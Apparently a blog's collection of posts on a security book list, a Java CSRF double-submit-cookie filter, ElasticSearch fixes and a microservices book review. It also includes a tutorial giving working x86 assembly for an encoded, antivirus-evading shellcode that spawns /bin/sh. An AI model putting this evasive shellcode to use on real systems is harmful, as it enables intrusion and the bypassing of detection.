5 (software) security books that every (software) developer should read

I must admit that the title is a little catchy; a better title would have been “5 software security books that every developer should be aware of“. Depending on your interest you might want to read these books in full, or just know that they exist. There must be tons of software security books on the market, but this is my short list of books that I think every developer with an interest in software security should know about.

Hacking – the art of exploitation This book explains the basics of different hacking techniques, especially non-web techniques: how to find (and defend against) vulnerabilities like stack-based buffer overflows, how to write shellcode, and some basic concepts of cryptography and cryptography-related attacks like the man-in-the-middle attack on an SSL connection. The author tried to make the text accessible to non-technical people, but some programming experience (ideally C/C++) is required to get the best out of this book. You can see my full review of the book here.

Iron-Clad Java: Building secure web applications This book presents hacking techniques and countermeasures for web applications; you can see this book as complementary to the previous one: the first covers non-web hacking techniques, this one covers (only) web hacking techniques: XSS, CSRF, how to protect data at rest, SQL injection and other types of injection attacks. To get the most out of the book some Java knowledge is required. You can see my full review of the book here.

Software Security – Building Security In This book explains how to introduce security into the SDLC: how to introduce abuse cases and security requirements in the requirements phase, and how to introduce risk analysis (also known as threat modeling) in the design and software qualification phases. I really think that every software developer should at least read the first chapter, where the author explains why the old way of securing applications (seeing them as “black boxes” that can be protected using firewalls and IDS/IPS) cannot work anymore in today's software landscape. You can see my full review of the book here: Part 1, Part 2 and Part 3.

The Tangled Web: A Guide to Securing Modern Web Applications This is another technical security book in which you will not see a single line of code (Software Security – Building Security In is another one), but it is highly instructive, especially if you are a web developer. The book presents all the “bricks” of today's Internet: HTTP, WWW, HTML, cookies, scripting languages, how these bricks are implemented in different browsers and, especially, how the browsers implement security mechanisms against rogue applications. You can see my full review of the book here.

Threat modeling – designing for security Threat modeling techniques (also known as architectural risk analysis) have been around for some time, but what has changed in recent years is the accessibility of these techniques to software developers. This book is one of the reasons why threat modeling is now accessible to developers. The book is very dense but it assumes no prior knowledge of the subject. If you are interested in the threat modeling topic you can check this ticket: threat modeling for mere mortals.

A Java implementation of CSRF mitigation using “double submit cookie” pattern

Goal of this article

The goal of this article is to present an implementation of the “double submit cookie” pattern used to mitigate Cross Site Request Forgery (CSRF) attacks. The proposed implementation is a Java filter plus a few auxiliary classes and it is (obviously) suitable for projects using Java as the back-end technology.

Definition of CSRF and possible mitigations

In the case of a CSRF attack, the browser is tricked into making unauthorized requests on the victim’s behalf, without the victim’s knowledge. The general attack scenario contains the following steps:

  1. the victim connects to the vulnerable web site, so it has a real, authenticated session.
  2. the hacker forces the victim (usually via a spam/phishing email) to navigate to another (evil) web site containing the CSRF attack.
  3. when the victim's browser executes the (evil) web site page, the browser makes a (fraudulent) request to the vulnerable web site using the user's authenticated session. The user is not aware at all that navigating on the (evil) web site triggers an action on the vulnerable web site.

For deeper explanations I strongly recommend reading chapter 5 of the Iron-Clad Java: Building Secure Web Applications book and/or the OWASP Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet.

Definition of “double submit cookie” pattern

When a user authenticates to a site, the site should generate a (cryptographically strong) pseudo-random value and set it as a cookie on the user's machine, separate from the session id. The server does not have to save this value in any way, which is why this pattern is sometimes also called the Stateless CSRF Defense.

The site then requires that every transaction request include this random value as a hidden form value (or other request parameter). A cross origin attacker cannot read any data sent from the server or modify cookie values, per the same-origin policy.

With this mitigation technique the job of the client is very simple: retrieve the CSRF cookie from the response and add it, in a special header, to all subsequent requests:


Client workflow
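
To make the client side concrete, here is a minimal sketch in plain Java (the URLs are hypothetical, and a real web client would typically do this in JavaScript or let a framework like AngularJS do it): read the CSRF cookie from the first response, then send the token back both as a cookie and in the CSRF header on every subsequent request.

import java.net.HttpURLConnection;
import java.net.URL;

public class CsrfClientSketch {
    public static void main(String[] args) throws Exception {
        //1. initial request: the server sets the CSRF cookie (default name: XSRF-TOKEN)
        HttpURLConnection first = (HttpURLConnection) new URL("https://example.com/app/login").openConnection();
        String setCookie = first.getHeaderField("Set-Cookie");

        String csrfToken = null;
        if (setCookie != null && setCookie.contains("XSRF-TOKEN=")) {
            int start = setCookie.indexOf("XSRF-TOKEN=") + "XSRF-TOKEN=".length();
            int end = setCookie.indexOf(';', start);
            csrfToken = setCookie.substring(start, end > 0 ? end : setCookie.length());
        }

        //2. state-changing request: send the token back as a cookie AND in the CSRF header
        HttpURLConnection post = (HttpURLConnection) new URL("https://example.com/app/transfer").openConnection();
        post.setRequestMethod("POST");
        post.setRequestProperty("Cookie", "XSRF-TOKEN=" + csrfToken);
        post.setRequestProperty("X-XSRF-TOKEN", csrfToken);
        System.out.println("Response code: " + post.getResponseCode());
    }
}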

The job of the server is a little more complex: create the CSRF cookie and, for each request asking for a protected resource, check that the CSRF cookie and the CSRF header of the request match:


Server workflow
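
As a rough illustration (this is not the actual filter code, which is described below), the core of the server-side check boils down to comparing the cookie token with the header token; here is a minimal sketch using the standard Servlet API and the default cookie/header names used later in this article:

import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;

public final class CsrfServerCheckSketch {

    private static final String CSRF_COOKIE_NAME = "XSRF-TOKEN";
    private static final String CSRF_HEADER_NAME = "X-XSRF-TOKEN";

    //returns true only if the CSRF cookie and the CSRF header carry the same token
    public static boolean csrfTokensMatch(HttpServletRequest request) {
        String headerToken = request.getHeader(CSRF_HEADER_NAME);
        if (headerToken == null || request.getCookies() == null) {
            return false;
        }
        for (Cookie cookie : request.getCookies()) {
            if (CSRF_COOKIE_NAME.equals(cookie.getName())
                    && headerToken.equals(cookie.getValue())) {
                return true;
            }
        }
        return false;
    }
}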

Note that some JavaScript frameworks like AngularJS implement the client workflow out of the box; see Cross Site Request Forgery (XSRF) Protection.

Java implementation of “double submit cookie” pattern

The proposed implementation is in the form of a (Java) servlet filter and can be found here: GenericCSRFFilter GitHub.

In order to use the filter, you must define it in your web.xml file:

<filter>
   <filter-name>CSRFFilter</filter-name>
   <filter-class>com.github.adriancitu.csrf.GenericCSRFStatelessFilter</filter-class>
</filter>

<filter-mapping>
   <filter-name>CSRFFilter</filter-name>
   <url-pattern>/*</url-pattern>
</filter-mapping>


The filter can have two optional initialization parameters: csrfCookieName, representing the name of the cookie that will store the CSRF token, and csrfHeaderName, representing the name of the HTTP header that will also contain the CSRF token.

The default values for these parameters are “XSRF-TOKEN” for csrfCookieName and “X-XSRF-TOKEN” for csrfHeaderName, both of them being the default values that AngularJS expects in order to implement its CSRF protection.
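
If you want to override these names, the two parameters can presumably be passed as standard servlet init-params; the values below are only an example:

<filter>
   <filter-name>CSRFFilter</filter-name>
   <filter-class>com.github.adriancitu.csrf.GenericCSRFStatelessFilter</filter-class>
   <init-param>
      <param-name>csrfCookieName</param-name>
      <param-value>MY-CSRF-COOKIE</param-value>
   </init-param>
   <init-param>
      <param-name>csrfHeaderName</param-name>
      <param-value>MY-CSRF-HEADER</param-value>
   </init-param>
</filter>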

By default the filter has the following features:

  • works with AngularJS.
  • the CSRF token will be a random UUID.
  • all the resources that are NOT accessed through a GET request method will be CSRF protected.
  • the CSRF cookie is replaced after each non-GET request.

How it works under the hood

Most of the functionality is in the GenericCSRFStatelessFilter#doFilter method; here is the sequence diagram that explains what happens in this method:

doFilter method sequence diagram

The doFilter method is executed on each HTTP request:

  1. The filter creates an instance of the ExecutionContext class; this class is a simple POJO containing the initial HTTP request, the HTTP response, the CSRF cookies (if more than one cookie with the csrfCookieName is present) and the implementations of the ResourceCheckerHook, TokenBuilderHook and ResponseBuilderHook (see the next section for the meaning of these classes).
  2. The filter checks the status of the requested HTTP resource using an instance of ResourceCheckerHook; the status can be MUST_NOT_BE_PROTECTED, MUST_BE_PROTECTED_BUT_NO_COOKIE_ATTACHED or MUST_BE_PROTECTED_AND_COOKIE_ATTACHED (see the ResourceStatus enum).
  3. If the resource status is ResourceStatus#MUST_NOT_BE_PROTECTED or ResourceStatus#MUST_BE_PROTECTED_BUT_NO_COOKIE_ATTACHED, then the filter creates a CSRF cookie having as token the token generated by an instance of TokenBuilderHook.
  4. If the resource status is ResourceStatus#MUST_BE_PROTECTED_AND_COOKIE_ATTACHED, then the filter computes the CSRFStatus of the resource and uses an instance of ResponseBuilderHook to return the response to the client.

How to extend the default behavior

It is possible to extend or overwrite the default behavior by implementing the hook interfaces. All the hook implementations must be thread-safe.

  1. The ResourceCheckerHook is used to check the status of a requested resource. The default implementation is DefaultResourceCheckerHookImpl and it will return ResourceStatus#MUST_NOT_BE_PROTECTED for any HTTP GET request; for all the other request types, it will return ResourceStatus#MUST_BE_PROTECTED_AND_COOKIE_ATTACHED if a CSRF cookie is present in the request, or ResourceStatus#MUST_BE_PROTECTED_BUT_NO_COOKIE_ATTACHED otherwise. The interface signature is the following one:
    public interface ResourceCheckerHook extends Closeable {
        ResourceStatus checkResourceStatus(ExecutionContext executionContext);
    }  
  2. The TokenBuilderHook hook is used to generate the token that will be used to create the CSRF cookie. The default implementation is DefaultTokenBuilderHookImpl and it uses a call to UUID.randomUUID to generate the token. The interface signature is the following one:
    public interface TokenBuilderHook extends Closeable {
        String buildToken(ExecutionContext executionContext);
    }
  3. The ResponseBuilderHook is used to generate the response to the client depending on the CSRFStatus of the resource. The default implementation is DefaultResponseBuilderHookImpl and it throws a SecurityException if the CSRF status is CSRFStatus#COOKIE_NOT_PRESENT, CSRFStatus#HEADER_TOKEN_NOT_PRESENT or CSRFStatus#COOKIE_TOKEN_AND_HEADER_TOKEN_MISMATCH. If the CSRF status is CSRFStatus#COOKIE_TOKEN_AND_HEADER_TOKEN_MATCH, then the old CSRF cookies are deleted and a new CSRF cookie is created. The interface signature is the following one:
    public interface ResponseBuilderHook extends Closeable {
        ServletResponse buildResponse(ExecutionContext executionContext,
                                      CSRFStatus status);
    }
    

The hooks are instantiated inside the GenericCSRFStatelessFilter#init method using the ServiceLoader Java 6 loading facility. So if you want to use your own implementation of one of the hooks, you have to create a META-INF/services directory containing a text file whose name is the fully-qualified name of the hook interface that you want to replace and whose content is the fully-qualified name of your implementation class.
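
For example, to replace the default token builder you could provide your own implementation; the class below is purely hypothetical (I also assume that the hook interfaces live in the com.github.adriancitu.csrf package, like the filter itself) and simply builds the token with SecureRandom instead of UUID.randomUUID:

package com.mycompany.security;

import java.io.IOException;
import java.security.SecureRandom;

import com.github.adriancitu.csrf.ExecutionContext;
import com.github.adriancitu.csrf.TokenBuilderHook;

//Hypothetical custom hook: builds the CSRF token with SecureRandom.
public class SecureRandomTokenBuilderHook implements TokenBuilderHook {

    private static final SecureRandom RANDOM = new SecureRandom();

    @Override
    public String buildToken(ExecutionContext executionContext) {
        byte[] bytes = new byte[32];
        RANDOM.nextBytes(bytes);
        StringBuilder token = new StringBuilder(bytes.length * 2);
        for (byte b : bytes) {
            token.append(String.format("%02x", b));
        }
        return token.toString();
    }

    @Override
    public void close() throws IOException {
        //nothing to release
    }
}

The implementation is then registered in a file named META-INF/services/com.github.adriancitu.csrf.TokenBuilderHook whose single line contains com.mycompany.security.SecureRandomTokenBuilderHook.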

Here is the sequence diagram representing the hook initialization:

init method sequence diagram

ElasticSearch: How to enable scripting on the embedded server

The goal

In this ticket I will present all the required steps in order to enable scripting on an embedded ElasticSearch server. I will not explain how to create and use an embedded server, but if you need more information you can read this ticket: Embedded Elasticsearch Server for Tests.

If you execute a script within the embedded server, the following exception will be thrown:

Caused by: java.lang.IllegalArgumentException: script_lang not supported [xxxxx]
    at  org.elasticsearch.script.ScriptService.getScriptEngineServiceForLang(ScriptService.java:211)

 Code changes

 The easiest way to create an embedded server is the following one:

 Node node = NodeBuilder.nodeBuilder()
              .local(true)
              .settings(
               //add settings here
               )
              .node();

The problem with this approach is that the NodeBuilder.node() method will create a Node instance with an empty list of plug-ins; see the NodeBuilder.build() method and the Node(Settings) constructor it relies on:

   /*
    * Builds the node without starting it.
    */
    public Node build() {
        return new Node(settings.build());
    }
    //Node(Settings) constructor
     /**
     * Constructs a node with the given settings.
     *
     * @param preparedSettings Base settings to configure the node with
     */
     public Node(Settings preparedSettings) {
        this(InternalSettingsPreparer
                .prepareEnvironment(preparedSettings, null),
             Version.CURRENT,
             Collections.<Class<? extends Plugin>>emptyList());
     }

In order to create a node having a list of desired plug-ins the second constructor of the Node class should be used:

protected Node(
                Environment tmpEnv, 
                Version version, 
                Collection<Class<? extends Plugin>> classpathPlugins)

The problem with this (second) constructor is that it is protected, so we need to extend the Node class to be able to use it, and we also need to extend the NodeBuilder class in order to use the new Node class.

And here is the code:

  //PluginNode class 
  private static class PluginNode extends Node {
      public PluginNode(Settings preparedSettings, List<Class<? extends Plugin>> plugins) {
         super(InternalSettingsPreparer.prepareEnvironment(preparedSettings, null), Version.CURRENT, plugins);
      }
  }

  //PluginNodeBuilder class
  public class PluginNodeBuilder extends NodeBuilder {
        private List<Class<? extends Plugin>> plugins = new ArrayList<>();
        
        public PluginNodeBuilder() {
            super();
        }
        //new method to add plug-ins       
        public PluginNodeBuilder addPlugin(Class<? extends Plugin> plugin) {
            plugins.add(plugin);
            return this;
        }

        @Override
        //use the new PluginNode to build a node 
        public Node build() {
            return new PluginNode(settings().build(), plugins);
        }
    }

And how to use the new node builder:

 Node node = new PluginNodeBuilder()
                .addPlugin(ExpressionPlugin.class)
                .addPlugin(GroovyPlugin.class)
                .local(true)
                .settings(
                 //add settings here
                 )
                .node();

Enable scripting feature

The previous Java code alone will not be sufficient to execute scripts; you must also use the right settings when the server is created and add the required (Maven) dependencies to your classpath.

Server settings

 Node node = new PluginNodeBuilder()
                .addPlugin(ExpressionPlugin.class)
                .addPlugin(GroovyPlugin.class)
                .local(true)
                .settings(Settings.settingsBuilder()
                     ...
                     //this is common for all languages
                     .put("script.inline", true)
                     //these are the settings for the groovy language
                     .put("script.engine.groovy.inline.mapping", true)
                     .put("script.engine.groovy.inline.search", true)
                     .put("script.engine.groovy.inline.update", true)
                     .put("script.engine.groovy.inline.plugin", true)
                     .put("script.engine.groovy.inline.aggs", true)

                     //these are the settings for the expression language
                     .put("script.engine.expression.inline.mapping", true)
                     .put("script.engine.expression.inline.search", true)
                     .put("script.engine.expression.inline.update", true)
                     .put("script.engine.expression.inline.plugin", true)
                     .put("script.engine.expression.inline.aggs", true)

If you want more details about all the possible settings options, you can look at the ElasticSearch scripting documentation.

Maven dependencies

For the expression language:

       <dependency>
            <groupId>org.apache.lucene</groupId>
            <artifactId>lucene-expressions</artifactId>
            <version>5.5.2</version>
            <scope>compile</scope>
        </dependency>

       <dependency>
            <groupId>org.elasticsearch.module</groupId>
            <artifactId>lang-expression</artifactId>
            <version>2.2.0</version>
            <scope>compile</scope>
        </dependency>

For the groovy language:

<dependency>
    <groupId>org.elasticsearch.module</groupId>
    <artifactId>lang-groovy</artifactId>
    <version>2.3.2</version>
</dependency>
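
With the plug-ins, the settings and the dependencies in place, a quick way to check that scripting really works is to run a query that uses an inline script. The sketch below assumes the ElasticSearch 2.x Java API and uses hypothetical index and field names; the Client instance is the one returned by node.client() on the embedded node built above:

import org.elasticsearch.action.search.SearchResponse;
import org.elasticsearch.client.Client;
import org.elasticsearch.script.Script;
import org.elasticsearch.script.ScriptService.ScriptType;

public class EmbeddedScriptingCheck {

    //runs a search that computes a script field with an inline Groovy script
    public static SearchResponse searchWithInlineScript(Client client) {
        Script script = new Script(
                "doc['price'].value * 2",   //inline script body
                ScriptType.INLINE,
                "groovy",
                null);                      //no script parameters

        return client.prepareSearch("my_index")
                .addScriptField("double_price", script)
                .get();
    }
}

If scripting is not correctly enabled, this kind of call is exactly what triggers the script_lang not supported exception shown at the beginning of this ticket.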

ElasticSearch: How to programmatically update settings of an existing index

The goal of this ticket is to show how to programmatically update the settings of an existing ElasticSearch index. I will take as an example the ElasticSearch synonyms. Imagine that for a specific index, you have the following synonyms settings:

 "analysis": {
      "filter": {
        "synonym_filter": {
          "type": "synonym",
          "ignore_case": true,
          "synonyms": [
            "Romania, RO",
            "Belgium, BE"
          ]
        }
      },
....

Now, imagine (also) that you want to add a new entry to the synonyms list (“France, FR”). You could do this by using the ElasticSearch REST interface (please go here if you want to know more: Elasticsearch: updating the mappings and settings of an existing index) or you can use the Java API offered by ElasticSearch to do the same task programmatically:

//close the index before the update
client.admin().indices().close(new CloseIndexRequest(indexName));

//update the synonyms
client.admin().indices().prepareUpdateSettings(indexName).setSettings(
             Settings.builder()
                .put(
                        //setting prefix
                        "index.analysis.filter.synonym_filter",
                        //group name
                        "synonyms",
                        //settings
                        new String[] {"0", "1", "2"},
                        //values
                        new String []{
                                 "Romania,RO", 
                                 "Belgium,BE", 
                                 "France,FR"
                                      }
                       )
            ).get();

//open the index
client.admin().indices().open(new OpenIndexRequest(indexName));


Useful links:

ElasticSearch Doc – Update Indices Settings

(Unofficial) ElasticSearch Java API for the IndicesAdminClient interface

(Unofficial) ElasticSearch Java API for the ImmutableSettings.Builder.put method


Book review: Building microservices (part 1)

This is the first part of the review of the Building Microservices book.

Chapter 1: Microservices

This first chapter is a quick introduction to microservices: the definition, the genesis of the concept and the key benefits. The microservices idea emerged from the (new) ways of crafting software today; these new ways imply the use of domain-driven design, continuous delivery, virtualization, infrastructure automation and small autonomous teams.

The author is defining the microservices as “small, autonomous services that work together”.

The key benefits of the microservices are:

  • technology heterogeneity; use the right tool for the right job.
  • resilience; because the microservices have quite well defined service boundaries, failures do not cascade and it is easy to quickly find and isolate the problem(s).
  • scaling; the microservices can be deployed and run independently, so it is possible to choose which microservices need special attention and scale them accordingly.
  • ease of deployment; microservices are independent by nature, so they can be (re)deployed individually.
  • optimizing for replaceability; due to their autonomous nature, microservices can easily be replaced with new versions.

Chapter 2: The Evolutionary Architect

This chapter is about the role of the architect in the new IT landscape. For the author, the qualities of an IT architect are the following: he should have a vision and be able to communicate it very clearly; he should have empathy, so he can understand the impact of his decisions on colleagues and customers; he should be able to collaborate with others in order to define and execute the vision; he should be adaptable, so he can change the vision as the requirements change; and he should be autonomous, so he can find the right balance between standardizing and enabling autonomy for the team.

For me this chapter does not fit very well in the book, because all the ideas in it could just as well be applied to monolithic systems.

Chapter 3: How to model services

The goal of this chapter is to show how to split services the right way by finding the boundaries between them. In order to find the right service boundaries, you must look at the problem from the model point of view.

The author introduces the notion of bounded context, a notion that was coined by Eric Evans in his Domain-Driven Design book. Any domain consists of multiple bounded contexts, and residing within each are components that do not need to be communicated outside, as well as things that should be shared externally with other bounded contexts. By thinking in terms of the model, it is possible to avoid the tight-coupling pitfall. So, each bounded context represents an ideal candidate for a microservice.

This cut on the bounded context is rather a vertical slice, but in some situations, due to technical boundaries, the cut can be done horizontally.

Chapter 4: Integration

All the ideas of this chapter revolve around 3 axes: inter-microservice integration, user interface integration with microservices and COTS (Commercial Off The Shelf) software integration with microservices.

For the inter-microservice integration, different communication styles (synchronous versus asynchronous), different ways to manage (complex) business processes (orchestration versus choreography) and technologies (RPC, SOAP, REST) are very carefully explained with all their advantages and drawbacks. The author tends to prefer the asynchronous-choreographed style using REST, but he emphasizes that there is no ideal solution.

Then some integration issues are tackled: the service versioning problem, and how to (wisely) reuse code between microservices and/or client libraries; no one-size-fits-all solution is proposed, just different options.

For the user interface integration with microservices some interesting ideas are presented, like creating a different back-end API for each UI technology that uses your microservices (a back-end API for the mobile application and a different back-end API for the web application). Another interesting idea is to have services directly serving up UI components.

The part about the integration of microservices with COTS covers the problems a team should solve in order to integrate with COTS: lack of control (the COTS could use a different technology stack than your microservices) and difficult customization of the COTS.

Chapter 5: Splitting the Monolith

The goal of this chapter is to present some ideas about how to split a monolithic application into microservices. The first proposed step is to find portions of the code that can be treated in isolation and worked on without impacting the rest of the codebase (these portions of code are called seams, a word coined by Michael Feathers in Working Effectively with Legacy Code). The seams are the perfect candidates for the service boundaries.

In order to easily refactor the code to create the seams, the author recommends the Structure101 application, which is an ADE (Architecture Development Environment); for alternatives to Structure101 you can see Architecture Development Environment: Top 5 Alternatives to Structure101.

The rest of the chapter is about how to find seams in the database and in the code that uses it. The overall idea is that every microservice should have its own independent (DB) schema. Different problems will arise if this happens, like the foreign-key relationship problem, sharing of static data stored in the DB, shared tables and the transactional boundaries. Each of these problems is discussed in detail and multiple solutions are presented.

The author recognizes that splitting the monolith is not trivial at all and that it should start very small (for the DB, for example, a first step would be to split the schema and keep the code as it was before; a second step would be to migrate some parts of the monolithic code towards microservices). He also recognizes that sometimes the splitting brings new problems (like the transactional boundaries).

Chapter 6: Deployment

This chapter presents different deployment techniques for the microservices. The first topic that is tackled is how the microservices code should be stored and how the Continuous Integration (CI) process should work; multiple options are discussed: one code repository for all microservices and one CI server; one code repository per microservice and one CI server; build pipelines per operating system or per platform artifact.

A second topic around deployment is the infrastructure on which the microservices are deployed. Multiple deployment scenarios are presented: all microservices deployed on the same host, one microservice per host, virtualized hosts, dockerized hosts. The most important idea in this part is that all the deployment and host creation should be automated; the automation is essential for keeping the team(s) productive.


How to write a (Linux x86) custom encoded shellcode

Goal

Very often shellcode authors will try to obfuscate the shellcode in order to bypass IDS/IPS or anti-virus software. This kind of shellcode is often called an “encoded shellcode”. The goal of this ticket is to propose a (rather simple) encoding schema and the decoding part written in assembler.

What is an encoded shellcode

An encoded shellcode is a shellcode that has its payload encoded in order to escape signature-based detection. To work correctly the shellcode must first decode the payload and then execute it. For a very basic example you can check the A Poor Man’s Shellcode Encoder / Decoder video.

(My) custom encoder

The encoding schema that I propose is the following one:

  • the payload is split into blocks of random size between 1 and 9 bytes.
  • the first octet of each block represents the size of the original block.
  • the last byte of the last block is a special character representing a terminator (0xff).

Supposing that the payload is something like:

0xaa,0xbb,0xcc,0xdd,0xee

One possible encoding version could be:

0x02,0xaa,0xbb,0x01,0xcc,0x03,0xdd,0xee,0xff

or

0x04,0xaa,0xbb,0xcc,0xdd,0x02,0xee,0xff

or

0x09,0xaa,0xbb,0xcc,0xdd,0xee,0xff

If you want to play with this encoding schema you can use the Random-Insertion-Encoder.py program, which will write to the console the encoded version of a given shellcode.

(My) custom decoder

So, initially the payload is encoded (with the custom schema) and, when the shellcode is executed, the decoder must run first in order to obtain a valid payload. The decoder will decode the payload and then pass the execution to it.

The first problem that the decoder should solve is to find the memory address of the encoded payload. In order to do this, we will use the “Jump Call Pop” mechanism explained in the Introduction to Linux shellcode writing (Part 2) (paragraph 5.1 ).

The skeleton of the decoder will look like this:

global _start 
section .text
_start:
 jmp short call_shellcode
decoder:
 ; the top of the stack contains the
 ; address of the EncodedShellcode
 
 ; decoder code
call_shellcode:
 call decoder
 EncodedShellcode: db 0x06,.........,0xff

A few words before showing you the code of the decoder. The decoder basically moves bytes from right to left, skipping the first byte of each block, until the terminator byte is found. For moving the bytes the lodsb and stosb instructions are used. These instructions use the ESI (lodsb) and EDI (stosb) registers, so you can see ESI as the source register and EDI as the destination register.

The DL register is used as the block byte counter and the CL register contains the content of the first byte of each block. So, in order to know if all the bytes of a block have been copied, a comparison between DL and CL is done.

Special care should be taken before the ESI register is incremented, either manually or automatically by the lodsb instruction. A check should be made to see whether ESI points to the terminator byte, and if so the copy must stop; otherwise the decoder will try to read memory locations to which it has no access (and the program will crash with a core dump).

So, here is the code of the decoder:

global _start 
section .text
_start:
 jmp short call_shellcode

decoder:
 ;get the adress of the shellcode
 pop esi

 ;align edi and esi
 lea edi, [esi]

handle_next_block:
 ;check that the esi do not point
 ;to the terminator byte
 xor ecx,ecx
 mov cl, byte[esi]
 mov bl , cl
 xor bl, 0xff

 ;if esi points to terminator byte
 ;then execute the shellcode
 jz short EncodedShellcode

 ;otherwise skip this byte
 ;because it's the first byte
 ;of the block and it contains
 ;the number of bytes that
 ;the block contains.
 inc esi
 
 ;dl it is used to count the
 ;number of bytes from a block
 ;already copied
 xor edx, edx
 
handle_next_byte:
 ;check that the esi do not point
 ;to the terminator byte
 mov bl, [esi]
 xor bl, 0xff
 
 ;if esi points to terminator byte
 ;then execute the shellcode
 jz short EncodedShellcode
 
 ;otherwise copy the byte pointed by
 ;esi to the location pointed by edi;
 ;esi is automatically incremented by
 ;the lodsb and edi by stosb
 lodsb
 stosb
 
 ;one more byte of the block had been copied
 ;so increment the counter
 inc dl
 
 ;check that all the bytes of the block
 ;have been copied;
 ;cl contains the first byte of the block
 ;representing the number of bytes of the
 ;block and dl contains the number of
 ;block bytes already copied
 cmp cl, dl
 
 ;if not zero then not all the block bytes
 ;have been copied
 jnz handle_next_byte
 
 ;otherwise go to the next block
 jmp handle_next_block
call_shellcode:
 call decoder
 EncodedShellcode: db 0x06,0x31,0xc0,0x50,0x68,0x2f,0x2f,0x09,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x01,0x50,0x07,0x89,0xe2,0x53,0x89,0xe1,0xb0,0x0b,0x01,0xcd,0x09,0x80,0xff

How to test the shellcode

In order to test the shellcode you must follow the next steps:

All the source code presented in this ticket can be found here: GitHub.

Bibliography

How to fix ElasticSearch client exception “A binding to org.elasticsearch.shield.transport was already configured at _unknown_. at _unknown_”

This ticket explains a possible solution for the “A binding to org.elasticsearch.shield.transport was already configured at _unknown_. at _unknown_” exception thrown when a Java ElasticSearch client tries to connect to an (ElasticSearch) cluster using Shield.

Environment

ElasticSearch version: 1.7.3

Shield version: 1.3.3

Context

The way to connect a Java ElasticSearch client to a cluster using Shield is quite straightforward; you can see the ElasticSearch documentation. The most important part (at least in the context of this problem) is the creation of the Settings instance:

Settings settings = ImmutableSettings.settingsBuilder()
                .put("cluster.name", clusterName)
                .put("shield.ssl.keystore.path", jksPath)
                .put("shield.ssl.keystore.password", jksPassword)
                .put("shield.transport.ssl", "true")
                .put("plugin.types", "org.elasticsearch.shield.ShieldPlugin")
                .build();
......

When the client is executed, the following strange stacktrace is thrown:

Full stacktrace

1) A binding to org.elasticsearch.shield.transport.filter.IPFilter was already configured at _unknown_.
  at _unknown_
2) A binding to org.elasticsearch.shield.transport.ClientTransportFilter was already configured at _unknown_.
  at _unknown_
3) A binding to org.elasticsearch.shield.ssl.ClientSSLService was already configured at _unknown_.
  at _unknown_
4) A binding to org.elasticsearch.shield.ssl.ServerSSLService was already configured at _unknown_.
  at _unknown_
4 errors
       at org.elasticsearch.common.inject.internal.Errors.throwCreationExceptionIfErrorsExist(Errors.java:344)
       at org.elasticsearch.common.inject.InjectorBuilder.initializeStatically(InjectorBuilder.java:151)
       at org.elasticsearch.common.inject.InjectorBuilder.build(InjectorBuilder.java:102)
       at org.elasticsearch.common.inject.Guice.createInjector(Guice.java:93)
       at org.elasticsearch.common.inject.Guice.createInjector(Guice.java:70)
       at org.elasticsearch.common.inject.ModulesBuilder.createInjector(ModulesBuilder.java:59)
       at org.elasticsearch.client.transport.TransportClient.<init>(TransportClient.java:195)
       at org.elasticsearch.client.transport.TransportClient.<init>(TransportClient.java:125)


Root cause

The root cause of this problem is the line:

.put("plugin.types", "org.elasticsearch.shield.ShieldPlugin")

If this line is removed then the problem is solved. This property should be used exclusively with the 2.0 version of Shield, not with the 1.3.3 version.
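
In other words, for this combination of versions the working Settings creation is the same builder shown above, minus the plugin.types line:

Settings settings = ImmutableSettings.settingsBuilder()
                .put("cluster.name", clusterName)
                .put("shield.ssl.keystore.path", jksPath)
                .put("shield.ssl.keystore.password", jksPassword)
                .put("shield.transport.ssl", "true")
                .build();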

The moral of this story? First of all, you should use the right version of the ElasticSearch documentation (in my case I was running the 1.7.3 version but I used the documentation for 2.0). The second point is that the ElasticSearch API is not very user friendly (I even dare to say it is badly designed); I would have preferred the ImmutableSettings.Builder class to have a put method with a Java enum as the first parameter, not a Java String.